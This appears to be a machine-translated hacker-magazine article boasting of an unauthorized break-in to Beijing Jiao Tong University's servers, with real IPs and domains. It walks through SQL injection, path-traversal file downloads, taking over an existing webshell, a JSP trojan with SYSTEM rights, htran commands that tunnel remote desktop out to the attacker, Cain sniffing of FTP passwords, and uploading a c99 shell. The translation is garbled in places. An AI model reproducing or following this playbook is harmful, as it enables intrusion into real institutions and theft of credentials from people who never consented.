Penetrate the master server of Beijing Jiao Tong University

Author: Tm3yShell7

It has been published in the XX period of "hacker XFile"

The goal is my school: the main site of Beijing Jiao Tong University. The security of university sites is obvious to all. Collect information carefully. There are no new technologies used in this process. It is a typical process for new users to learn about how to use sniffing to achieve intrusion. The most important thing in penetration is how to use ideas.

The master site ip address is 202.112.144.31. After reading the full static page, there are no other sites on the same server. Only ports 21 and 80 are opened, and the linux system is running, the security of the main site must not be said. At least I cannot afford this kind of dish. Therefore, we initially decided to use sniffing. Scan port 80 in the same c segment and find that only one 202.112.144.32 is open. First, check its situation.

Figure 1 shows the port 202.112.144.32 opened. When the port is pinged, the TTL is 125, which may be the Win operating system. According to the scanning situation, the current information on the server is: Win system, network service only ftp, Web. Access ports 80 and 8080 respectively, which are the websites of the student affairs office and the Academic Affairs Office. The scripts used are asp and jsp. According to the current information, there are few open ports and the most likely breakthrough is Web. Let me check out the student office first. jsp is not feasible first, and the general school also attaches great importance to the security of the Academic Affairs Office.

When I saw the asp site, I first thought of SQL Injection. I clicked a piece of news and added a 'After the url parameter. An unclosed quotation mark error occurred, 2. Obtain the password and start searching for the background. Use wwwscan to scan the directory structure of the site. Expected result 3 is displayed. The sensitive directories manage and dbase are obtained. Visit http://jgxsc.njtu.edu.cn/manage/in your browser and you will find that you can access the content in your browser. I learned that the login page is login. asp. By the way, I visited dbase and downloaded the database file in dbase. The Administrator information in the page is consistent with the information obtained by injection points.

After logging on to the console, I found that this background has basically no permissions and is embedded with the editing page of eWebEditor. There are many ways to use this website content editor to get shell. Click the smiling face, add an expression, and view its address to get the directory where eWebEditor is located. Then I tried the default password, downloaded the default database, and used the upload page injection some time ago. The background function written by the website itself is too simple. It can be achieved by using this background for damages. However, it is still difficult to obtain the webshell through this function.

Now, there seems to be nothing available, so I began to flip it over and suddenly saw an asa file in the upload directory under ewebeditor (figure 4 ). Does it mean "the same person in the same path? After trying to access the Web shell, it is not surprising that the security of the eweb is so good as it is the webshell left by our predecessors .. but we can only look at this cute girl with no password.

The idea seems to be dead. However, since someone has already come in, it indicates that there are still some available sites that can use webshells. I continued to wander around the website and suddenly found a place where resources were downloaded, the url of the connection is shown in the following figure: download. asp? Fileurl00002008611761278221.doc (5). If the FileUrl parameter of this file is not filtered ../, I can use ../to download other files in the web directory from the current directory. So I tried to use index. asp in the web root directory as the flag and use ../to jump to the site root directory. First try to submit download. asp? FileUrl = ../index. asp, cannot be displayed. It cannot be jumped out of level 1. Then, jump up to level 1 and submit download. asp? FileUrl =.../index. asp finally shows the download box (figure 6! We can download the webshell of someone we met just now, read the source code to know the password, and then log on to his webshell. Construct download. asp? Based on the relative path of shell? FileUrl =.../ewebeditor/uploadfile/2008611568654565.asa. the webshell is successfully downloaded and encrypted (Figure 7) is displayed ). The password is encrypted. However, the "<% @ LANGUAGE = VBScript. Encode %>" at the beginning prompts that we are using ScriptEncoder encryption. After the encryption at http://www.hao123.com/haoserver/jmjm.htm, the password must be abc123.

Find the webshell and enter abc123 to log on. First use a script Trojan to scan the open port, which is 3389 more than the remote scan (Figure 8). It should be because the login ip segment is limited. WScript. the Shell is not deleted. net start does not discover any soft and firewall services, and there is a tomcat academic office station on the server, if we ran the system permission, we would have to raise the permission, so we started to find the root directory of the Academic Affairs Office. I tried to access the root directory of drive D. I didn't expect to jump to any directory on the server, which is readable and writable.

The student office domain name is jgxsc.njtu.edu.cn, the corresponding website root directory is D: \ xxx \ jgxsc, and the academic office domain name is jgjwc.njtu.edu.cn, so find D: \ xxx \ jgjwc, it was found that there were no website files at all, all of which were binary executable files. What should I do if I cannot find the absolute site path? Blind on the server? I suddenly thought that the webshell of "Same person" had a search function, so I found a connection on the Office of Academic Affairs homepage and used a special file name in the url as a keyword for the search, such: infor_detail_window.jsp. There is only one result. Under D: \ xxx \ (figure 9), a jsp Trojan is uploaded at D: \ xxx. Run whoami in jsp. The permission is system.

Although the shell under the jsp Trojan is already the system permission, it is easier to perform sniffing on a graphical interface, so I started to try to connect to the Remote Desktop of the other party. The scan fails to reach 3389 on the machine, but is open in the script Trojan. This indicates that the login from other ip addresses is restricted. This is not difficult because we use htran for port forwarding. Use webshell to upload htran to the server. Here I pass it to D: \ xxx \ sys.exe, and then run Htran locally. The command is "htran.exe-Listen 9999 8888". Enable ports 9999 and 8888, port 9999 is used for listening. Then, Run "D: \ xxx \ sys.exe-Slave x. x 9999 127.0.0.1 3389" in webshell to map port 3389 of the server to port 9999 of my machine. After the command is successfully executed, you will see that the server is connected to the local port 9999 In the CMD window of the local htran running (Figure 10 ). Log on to the Remote Desktop of the server by connecting to local 8888.

Run tracert 202.112.144.3 on the Academic Affairs server (figure 11) to verify that you and your master are in the same exchange environment and meet the sniffing conditions. After the Cain and WinPcap drivers are installed, start sniffing for 202.112.144.31. Good luck. At the beginning of the morning, I found two target ftp users (12) in the afternoon. One of them is webadmin, which is like a website management account. log on to it, the ftp directory is a web directory. Upload a c99 file. At this point, the website permissions of the master site of Jiaotong University have been obtained (figure 13 ).